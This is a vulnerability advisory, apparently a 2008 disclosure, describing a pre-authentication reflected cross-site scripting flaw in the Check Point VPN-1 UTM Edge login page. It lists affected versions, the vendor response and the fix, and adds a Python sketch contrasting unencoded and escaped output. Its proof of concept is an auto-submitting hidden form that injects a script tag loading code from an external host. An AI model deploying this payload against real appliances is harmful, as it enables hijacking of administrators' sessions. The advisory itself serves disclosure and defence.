VPN-1 UTM Edge appliances "deliver unified threat management to enterprises with branch offices and simplify security deployments and manageability. VPN-1 UTM Edge appliances consolidate proven enterprise-class technology into a single branch office solution that does not compromise the corporate network and eliminates the branch office as your weakest link. As part of Check Point's Unified Security Architecture, VPN-1 UTM Edge can enforce a global security policy and allows administrators to manage and update thousands of appliances as easily as managing one."
Insufficient input validation and output encoding on the login page allows an attacker to perform HTML injection by posting a suitable string to the login form handler. The injection leads to reflected, pre-authentication cross-site scripting.
Credit:
The information has been provided by Henri Lindberg.
The original article can be found at: http://www.louhi.fi/advisory/checkpoint_080306.txt
Vulnerable Systems:
* Checkpoint VPN-1 Edge W Embedded NGX version 7.0.48x
Immune Systems:
* Checkpoint VPN-1 Edge W Embedded NGX version 7.5.48
Form-based authentication is used only when the device is accessed over HTTP. Authentication over HTTPS uses HTTP basic authentication.
The device does not accept the parameters in a GET request; a POST request has to be used instead. Exploiting the XSS vulnerability therefore requires a bit more effort than an ordinary GET-based reflected cross-site scripting vulnerability.
The current version can be checked at http://xxx.xxx.xxx.xxx/pub/test.html, where xxx.xxx.xxx.xxx is the LAN IP address of the device. The page also displays the current product key.
Vendor response:
"Once users register the appliance and connect to the service center (Safe@Office appliances), the latest firmware is automatically downloaded to their appliance. For UTM-1 Edge appliances, the latest firmware version can be downloaded from the Check Point download center. Currently, this is version 7.5.48 that does not contain the reported issue. We believe that customers are not exposed to this issue."
Proof of Concept:
<html>
<body onload="document.f.submit()">
<form name="f" method="post" action="http://192.168.10.1"
style="display:none">
<input name="user" value="'<script/src=//l7.fi></script>">
</form>
</body>
</html>
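As an added illustration that is not part of the original advisory or Check Point's code, the following Python sketch of a login handler shows why a value such as the one posted above works when it is reflected unencoded into a quoted attribute, and how context-aware output encoding neutralises it. The handler names, the HTML template and the reflection into a single-quoted value attribute are assumptions.

```python
import html

# Constructed test input mirroring the string from the proof of concept above.
POC_USER = "'<script/src=//l7.fi></script>"


def render_login_vulnerable(user: str) -> str:
    """Assumed shape of the flawed handler: the posted 'user' value is written
    back into a single-quoted attribute with no encoding, so a leading quote
    closes the attribute and the remainder is parsed as markup."""
    return ("<form method='post'>"
            "<input name='user' value='" + user + "'>"
            "</form>")


def render_login_hardened(user: str) -> str:
    """Same template with output encoding for the attribute context:
    html.escape(quote=True) turns <, >, &, \" and ' into entities, so the
    value can neither leave the attribute nor introduce a tag. Escaping only
    angle brackets would not be enough here, because the break-out relies on
    the quote character."""
    return ("<form method='post'>"
            "<input name='user' value='" + html.escape(user, quote=True) + "'>"
            "</form>")


def reflects_raw_markup(page: str, submitted: str) -> bool:
    """Detection helper for a test harness: a response that still contains
    the submitted string verbatim, while that string carries a tag, is
    reflecting input into HTML without encoding."""
    return "<" in submitted and submitted in page


if __name__ == "__main__":
    print("vulnerable reflects markup:",
          reflects_raw_markup(render_login_vulnerable(POC_USER), POC_USER))
    print("hardened reflects markup:  ",
          reflects_raw_markup(render_login_hardened(POC_USER), POC_USER))
```

The hardened output still round-trips the original value through html.unescape, so the fix changes nothing about what the user typed, only how it is serialised.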
Solution:
Update to version 7.5.48
Disclosure Timeline:
19. February 2008 - Contacted Checkpoint by email
20. February 2008 - Vendor response.
6. March 2008 - Advisory was released